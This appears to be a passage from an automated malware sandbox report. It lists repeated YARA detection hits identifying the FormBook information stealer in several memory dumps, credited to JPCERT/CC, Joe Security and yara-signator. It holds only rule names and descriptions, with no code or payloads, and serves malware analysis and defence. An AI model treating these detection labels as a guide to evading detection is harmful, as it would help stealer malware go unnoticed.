                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:moderate

                                                                                              No disassembly